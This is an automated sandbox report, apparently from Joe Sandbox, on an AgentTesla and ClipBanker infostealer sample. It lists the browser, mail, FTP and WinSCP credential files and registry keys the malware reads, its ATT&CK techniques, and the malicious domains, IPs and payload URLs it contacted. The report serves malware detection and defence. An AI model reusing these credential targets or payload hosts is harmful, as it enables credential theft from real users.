                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 3796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2968, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 5328, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 3796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2968, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 3796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2968, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 5328, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		21
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		1
                      Taint Shared Content                      		11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		11
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules                      		1
                      Windows Service                      		1
                      Access Token Manipulation                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      System Network Connections Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		1
                      Windows Service                      		1
                      Timestomp                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object Model21
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job                      		21
                      Registry Run Keys / Startup Folder                      		311
                      Process Injection                      		1
                      DLL Side-Loading                      		LSA Secrets47
                      System Information Discovery                      		SSH1
                      Clipboard Data                      		123
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media2
                      Service Execution                      		RC Scripts1
                      Scheduled Task/Job                      		311
                      Masquerading                      		Cached Domain Credentials1
                      Query Registry                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                      Registry Run Keys / Startup Folder                      		1
                      Valid Accounts                      		DCSync341
                      Security Software Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem1
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow151
                      Virtualization/Sandbox Evasion                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection                      		Network Sniffing1
                      Application Window Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                      System Owner/User Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                      System Network Configuration Discovery                      		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554496 Sample: x.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 91 s82.gocheapweb.com 2->91 93 pywolwnvd.biz 2->93 95 2 other IPs or domains 2->95 129 Found malware configuration 2->129 131 Malicious sample detected (through community Yara rule) 2->131 133 Antivirus detection for dropped file 2->133 135 11 other signatures 2->135 10 x.exe 1 7 2->10         started        15 Wisrysxl.PIF 2->15         started        17 Wisrysxl.PIF 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 101 gxe0.com 198.252.105.91, 443, 49709, 49710 HAWKHOSTCA Canada 10->101 85 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 10->85 dropped 87 C:\Users\Public\Wisrysxl.url, MS 10->87 dropped 89 C:\Users\Public\Libraries\Wisrysxl, data 10->89 dropped 143 Drops PE files with a suspicious file extension 10->143 145 Writes to foreign memory regions 10->145 147 Allocates memory in foreign processes 10->147 149 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->149 21 lxsyrsiW.pif 4 10->21         started        25 cmd.exe 1 10->25         started        27 esentutl.exe 2 10->27         started        151 Sample uses process hollowing technique 15->151 29 lxsyrsiW.pif 15->29         started        153 Multi AV Scanner detection for dropped file 17->153 31 lxsyrsiW.pif 17->31         started        155 Antivirus detection for dropped file 19->155 157 Machine Learning detection for dropped file 19->157 file6 signatures7 process8 file9 77 C:\Users\user\AppData\...\server_BTC.exe, PE32 21->77 dropped 79 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 21->79 dropped 81 C:\Program Files (x86)\...\armsvc.exe, PE32 21->81 dropped 137 Drops executable to a common third party application directory 21->137 139 Infects executable files (exe, dll, sys, html) 21->139 33 server_BTC.exe 7 21->33         started        37 neworigin.exe 15 2 21->37         started        40 esentutl.exe 2 25->40         started        42 conhost.exe 25->42         started        83 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 27->83 dropped 44 conhost.exe 27->44         started        46 neworigin.exe 29->46         started        48 server_BTC.exe 29->48         started        50 neworigin.exe 31->50         started        52 server_BTC.exe 31->52         started        signatures10 process11 dnsIp12 73 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 33->73 dropped 103 Antivirus detection for dropped file 33->103 105 Multi AV Scanner detection for dropped file 33->105 107 Machine Learning detection for dropped file 33->107 127 2 other signatures 33->127 54 powershell.exe 33->54         started        57 cmd.exe 33->57         started        59 schtasks.exe 33->59         started        61 TrojanAIbot.exe 33->61         started        97 s82.gocheapweb.com 51.195.88.199, 49714, 49729, 49764 OVHFR France 37->97 99 api.ipify.org 104.26.13.205, 443, 49712, 49750 CLOUDFLARENETUS United States 37->99 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 37->109 111 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->111 113 Tries to steal Mail credentials (via file / registry access) 37->113 75 C:\Users\Public\alpha.pif, PE32 40->75 dropped 115 Drops PE files to the user root directory 40->115 117 Drops PE files with a suspicious file extension 40->117 119 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 40->119 121 Tries to harvest and steal ftp login credentials 46->121 123 Tries to harvest and steal browser information (history, passwords, etc) 46->123 125 Installs a global keyboard hook 46->125 file13 signatures14 process15 signatures16 141 Loading BitLocker PowerShell Module 54->141 63 conhost.exe 54->63         started        65 WmiPrvSE.exe 54->65         started        67 conhost.exe 57->67         started        69 timeout.exe 57->69         started        71 conhost.exe 59->71         started        process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF29%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\Public\Libraries\lxsyrsiW.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\neworigin.exe88%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://gxe0.com/yak/233_Wisrysx0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/t0%Avira URL Cloudsafe
                      https://gxe0.com:443/yak/233_WisrysxlfssX0%Avira URL Cloudsafe
                      http://s82.gocheapweb.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gxe0.com
                      		198.252.105.91
                      		truefalse
                        		high
                        api.ipify.org
                        		104.26.13.205
                        		truefalse
                          		high
                          s82.gocheapweb.com
                          		51.195.88.199
                          		truefalse
                            		high
                            pywolwnvd.biz
                            		54.244.188.177
                            		truefalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                		high
                                https://gxe0.com/yak/233_Wisrysxlfsstrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://gxe0.com/yak/233_Wisrysxx.exe, 00000000.00000002.2233962338.0000000020CAD000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://sectigo.com/CPS0x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://account.dyn.com/neworigin.exe, 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://ocsp.sectigo.com0x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://r11.o.lencr.org0#neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsoftpowershell.exe, 0000000B.00000002.2308580044.0000000007D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2264345961.0000000000542000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.ipify.org/tneworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://r11.i.lencr.org/0neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.ipify.orgneworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://gxe0.com/tx.exe, 00000000.00000002.2184605014.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2269466131.0000000004171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.c.lencr.org/0neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2494316547.0000000006422000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
